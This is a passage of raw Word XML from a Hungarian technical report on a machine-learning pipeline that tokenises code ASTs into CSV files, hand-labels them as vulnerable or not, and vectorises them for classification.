        <w:t xml:space="preserve"> sorait </w:t>
      </w:r>
      <w:r w:rsidR="00AD29FB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON felépítésből adódó </w:t>
      </w:r>
      <w:r w:rsidR="00266A05">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kulcsok alapján szelektálja</w:t>
      </w:r>
      <w:r w:rsidR="00563DF8">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> („kind”, „name”, „raw”)</w:t>
      </w:r>
      <w:r w:rsidR="00BE381B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00582545">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00301D65">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Ezek</w:t>
      </w:r>
      <w:r w:rsidR="00475ABD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nek</w:t>
      </w:r>
      <w:r w:rsidR="00301D65">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00616EBE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z értéke</w:t>
      </w:r>
      <w:r w:rsidR="00475ABD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00EB094F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00301D65">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>adják a fájlok fontos szavait és kifejezéseit</w:t>
      </w:r>
      <w:r w:rsidR="00E02B26">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, így </w:t>
      </w:r>
      <w:r w:rsidR="0049308D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>azonos nevű .csv kiterjesztésű fájlok</w:t>
      </w:r>
      <w:r w:rsidR="00DA47FC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> első oszlop</w:t>
      </w:r>
      <w:r w:rsidR="0032278D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>aiba</w:t>
      </w:r>
      <w:r w:rsidR="0049308D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> írja</w:t>
      </w:r>
      <w:r w:rsidR="00DA47FC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00477F2A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>az</w:t>
      </w:r>
      <w:r w:rsidR="00733DF3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">okat </w:t>
      </w:r>
      <w:r w:rsidR="002E5774">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>listá</w:t>
      </w:r>
      <w:r w:rsidR="001E248D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="002E5774">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ba fűzve.</w:t>
      </w:r>
      <w:r w:rsidR="005907F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Az oszlopokat </w:t>
      </w:r>
      <w:r w:rsidR="00466900">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egy olyan karakter választja el, ami az érték</w:t>
      </w:r>
      <w:r w:rsidR="008E4290">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ben</w:t>
      </w:r>
      <w:r w:rsidR="00466900">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A4187E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>– továbbiakban toke</w:t>
      </w:r>
      <w:r w:rsidR="008E4290">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nekben</w:t>
      </w:r>
      <w:r w:rsidR="00A4187E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00466900">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">nem fordul elő, ezáltal </w:t>
      </w:r>
      <w:r w:rsidR="00233C2D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a program egy automatizált lépésben </w:t>
      </w:r>
      <w:r w:rsidR="00466900">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nem hoz létre több oszlopot, mint szükséges. Ez a</w:t>
      </w:r>
      <w:r w:rsidR="005907F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> karakter </w:t>
      </w:r>
      <w:r w:rsidR="00466900">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a ^</w:t>
      </w:r>
      <w:r w:rsidR="005907F3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0DA773" w14:textId="79A6EB9E" w:rsidR="00814D79" w:rsidRDefault="00814D79" w:rsidP="00B94E37">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13AA0FAD" w14:textId="6944BFD8" w:rsidR="00414668" w:rsidRPr="008115C5" w:rsidRDefault="00B94E37" w:rsidP="00C37C4B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008115C5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D80A38E" wp14:editId="1B0F2926">
            <wp:extent cx="5156465" cy="495325"/>
            <wp:effectExtent l="0" t="0" r="635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6465" cy="495325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D3194E" w14:textId="63A1F2F1" w:rsidR="00414668" w:rsidRPr="008115C5" w:rsidRDefault="00B94E37" w:rsidP="00B94E37">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="001B3B5F" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-as ábra: pdo1_ast.csv, a nodes.py</w:t>
      </w:r>
      <w:r w:rsidR="00C75648" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kimenete, a 3.2-es ábra bemenetre</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7942CC4B" w14:textId="5710C7FD" w:rsidR="00414668" w:rsidRPr="008115C5" w:rsidRDefault="00414668" w:rsidP="00B94E37">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691191B4" w14:textId="0E7A0FF8" w:rsidR="007D5B51" w:rsidRDefault="00662EE7" w:rsidP="000D6418">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00BD0230" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> következő lépésben a .csv fájlokat </w:t>
      </w:r>
      <w:r w:rsidR="003168D4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>fűzi</w:t>
      </w:r>
      <w:r w:rsidR="00BD0230" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> össze</w:t>
      </w:r>
      <w:r w:rsidR="00905357" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="008F7429">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00905357" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>concatenate.py</w:t>
      </w:r>
      <w:r w:rsidR="00170802" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00495151">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egy </w:t>
      </w:r>
      <w:r w:rsidR="00170802" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>csv fájlb</w:t>
      </w:r>
      <w:r w:rsidR="007A05A0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00495151">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> concatenated néven</w:t>
      </w:r>
      <w:r w:rsidR="007A05A0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>. E</w:t>
      </w:r>
      <w:r w:rsidR="004A44B3">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>zen</w:t>
      </w:r>
      <w:r w:rsidR="007A05A0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a pont</w:t>
      </w:r>
      <w:r w:rsidR="00766B40">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="007A05A0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009443B1" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">manuálisan </w:t>
      </w:r>
      <w:r w:rsidR="007C07DE" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>felcímkéz</w:t>
      </w:r>
      <w:r w:rsidR="00766B40">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="007C07DE" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>em őket</w:t>
      </w:r>
      <w:r w:rsidR="001C74BD" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00170802" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nnak duplikáltjá</w:t>
      </w:r>
      <w:r w:rsidR="00235644">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ban</w:t>
      </w:r>
      <w:r w:rsidR="00170802" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r w:rsidR="001C74BD" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> concatenated_titled.csv</w:t>
      </w:r>
      <w:r w:rsidR="00235644">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> második oszlopában</w:t>
      </w:r>
      <w:r w:rsidR="007C07DE" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, mint sérülékeny (0) vagy nem sérülékeny (1)</w:t>
      </w:r>
      <w:r w:rsidR="00CC342B" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> sor</w:t>
      </w:r>
      <w:r w:rsidR="00BD0230" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000D6418">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A duplikálás oka, </w:t>
      </w:r>
      <w:r w:rsidR="002D2D77">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hogy</w:t>
      </w:r>
      <w:r w:rsidR="000D6418">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> minden egyes újrafuttatásakor a concatenate.py újraírja a concatenated.csv-t</w:t>
      </w:r>
      <w:r w:rsidR="004E3E09">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ezáltal</w:t>
      </w:r>
      <w:r w:rsidR="00FF382E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004E3E09">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ha a manuális változtatások nem kerülnének át más fájlba, akkor elvesznének</w:t>
      </w:r>
      <w:r w:rsidR="000D6418">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E07F81" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Az összefűzés</w:t>
      </w:r>
      <w:r w:rsidR="00BD0230" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> oka</w:t>
      </w:r>
      <w:r w:rsidR="00FF382E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> pedig</w:t>
      </w:r>
      <w:r w:rsidR="00BD0230" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, hogy </w:t>
      </w:r>
      <w:r w:rsidR="00682CD5" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">későbbiekben az egyes </w:t>
      </w:r>
      <w:r w:rsidR="002C72AE">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tokenek</w:t>
      </w:r>
      <w:r w:rsidR="00682CD5" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> gyakorisága lesz fontos</w:t>
      </w:r>
      <w:r w:rsidR="00B35553" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az összes </w:t>
      </w:r>
      <w:r w:rsidR="000C0EF2" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B35553" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>csv viszonylatában</w:t>
      </w:r>
      <w:r w:rsidR="00ED3A41" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00034E93" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00ED3A41" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00FF5C5B" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00ED3A41" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> csak a saját</w:t>
      </w:r>
      <w:r w:rsidR="00AD694F" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>jában.</w:t>
      </w:r>
      <w:r w:rsidR="007E311E" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Így a </w:t>
      </w:r>
      <w:r w:rsidR="0077502E" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>vectorizer</w:t>
      </w:r>
      <w:r w:rsidR="007E311E" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">.py </w:t>
      </w:r>
      <w:r w:rsidR="00DB6130" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>már a</w:t>
      </w:r>
      <w:r w:rsidR="00E83C82" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidR="00DB6130" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D3089" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>összefűzött</w:t>
      </w:r>
      <w:r w:rsidR="00DB6130" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B225AD" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és felcí</w:t>
      </w:r>
      <w:r w:rsidR="00E278F7" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="00B225AD" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kézett </w:t>
      </w:r>
      <w:r w:rsidR="00DB6130" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>concatenated</w:t>
      </w:r>
      <w:r w:rsidR="001C74BD" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>_titled</w:t>
      </w:r>
      <w:r w:rsidR="00DB6130" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.csv-t dolgozza fel.</w:t>
      </w:r>
      <w:r w:rsidR="000C2677" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> A fájl legfőbb feladata</w:t>
      </w:r>
      <w:r w:rsidR="00782C20" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, hogy</w:t>
      </w:r>
      <w:r w:rsidR="000C2677" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> olyan </w:t>
      </w:r>
      <w:r w:rsidR="00782C20" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>numpy</w:t>
      </w:r>
      <w:r w:rsidR="000C2677" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> fájl</w:t>
      </w:r>
      <w:r w:rsidR="00782C20" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>okat</w:t>
      </w:r>
      <w:r w:rsidR="000C2677" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoz</w:t>
      </w:r>
      <w:r w:rsidR="00782C20" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>zon</w:t>
      </w:r>
      <w:r w:rsidR="000C2677" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> létre, ami</w:t>
      </w:r>
      <w:r w:rsidR="00782C20" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ket</w:t>
      </w:r>
      <w:r w:rsidR="000C2677" w:rsidRPr="008115C5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> később az osztályozásért felelős fájl használni</w:t>
      </w:r>
      <w:r w:rsidR="000C2677">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> tud.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201A0F18" w14:textId="697FDB6B" w:rsidR="003156D1" w:rsidRDefault="00B65A15" w:rsidP="000D6418">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Kifejtve a főbb metódusait:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00491663" w14:textId="32937625" w:rsidR="003156D1" w:rsidRDefault="007F1DD9" w:rsidP="00520418">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>__init__</w:t>
      </w:r>
      <w:r w:rsidR="00C51D0F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00014CCD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="00014CCD" w:rsidRPr="00ED0FD4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Vectorizer</w:t>
      </w:r>
      <w:r w:rsidR="00014CCD">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> osztály konstruktora</w:t>
      </w:r>
      <w:r w:rsidR="00ED0FD4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009B549D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ami </w:t>
      </w:r>
      <w:r w:rsidR="006E06C2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">paraméterként </w:t>
      </w:r>
      <w:r w:rsidR="0007448E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">kér egy </w:t>
      </w:r>
      <w:r w:rsidR="00601E96">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>fájl nevet</w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>filename</w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00601E96">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00010091">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00082269">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>zoknak a tokeneknek a maximális szám</w:t>
      </w:r>
      <w:r w:rsidR="00914AB2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>á</w:t>
      </w:r>
      <w:r w:rsidR="00082269">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amelyeket megkülönböztetünk egymástól </w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>max_vocab</w:t>
      </w:r>
      <w:r w:rsidR="00B47ED7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00010091">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">és </w:t>
      </w:r>
      <w:r w:rsidR="00912A82">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00973E72">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>nnak a maximális szám</w:t>
      </w:r>
      <w:r w:rsidR="00914AB2">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>át</w:t>
      </w:r>
      <w:r w:rsidR="00973E72">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00912A82">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
